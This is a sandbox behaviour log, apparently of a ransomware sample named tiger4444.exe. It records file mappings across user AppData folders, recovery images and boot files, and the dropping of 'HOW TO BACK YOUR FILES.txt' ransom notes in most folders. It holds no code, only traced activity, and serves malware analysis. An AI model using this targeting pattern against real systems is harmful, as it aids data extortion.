Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 334384 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, protection = PAGE_READWRITE, maximum_size = 297792 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, protection = PAGE_READWRITE, maximum_size = 269440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, protection = PAGE_READWRITE, maximum_size = 257136 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL, protection = PAGE_READWRITE, maximum_size = 252224 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 285584 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 295296 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL, protection = PAGE_READWRITE, maximum_size = 271424 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL, protection = PAGE_READWRITE, maximum_size = 218352 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl, protection = PAGE_READWRITE, maximum_size = 256000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL, protection = PAGE_READWRITE, maximum_size = 252112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL, protection = PAGE_READWRITE, maximum_size = 345440 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb, protection = PAGE_READWRITE, maximum_size = 201472 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw, protection = PAGE_READWRITE, maximum_size = 127744 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, protection = PAGE_READWRITE, maximum_size = 1312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol, protection = PAGE_READWRITE, maximum_size = 976 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, protection = PAGE_READWRITE, maximum_size = 19536 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, protection = PAGE_READWRITE, maximum_size = 992 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, protection = PAGE_READWRITE, maximum_size = 8640 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, protection = PAGE_READWRITE, maximum_size = 1408 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, protection = PAGE_READWRITE, maximum_size = 1200 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\deployment.properties filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\deployment.properties, protection = PAGE_READWRITE, maximum_size = 1520 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Map Z:\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map Z:\System Volume Information\tracking.log process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\BOOTNXT process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\bootsect.exe process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\boot.sdi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\DW20.EXE process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\boot.sdi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map Z:\Recovery\WindowsRE\ReAgent.xml process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\Winre.wim process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\DWTRIG20.EXE process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\Winre.wim process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\EnableWiFiTracing.cmd process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\GatherOSState.EXE process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\Winre.wim process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\GetCurrentRollback.EXE process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\HttpHelper.exe process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\Winre.wim process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\PostOOBEScript.cmd process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\upgrader_default.log process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\upgrader_win10.log process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\Windows10UpgraderApp.exe process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\Winre.wim process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map Z:\Recovery\WindowsRE\Winre.wim process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\WinREBootApp32.exe process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\WinREBootApp64.exe process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\hwcompatShared.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\ux\block.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\bluelogo.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\bullet.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\default.css process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\default.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\default_eos.css process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\default_eos.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\default_oobe.css process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\default_oobe.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\eula.css process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\GetStarted.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\loading.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\lock.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\logo.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\marketing.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\pass.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
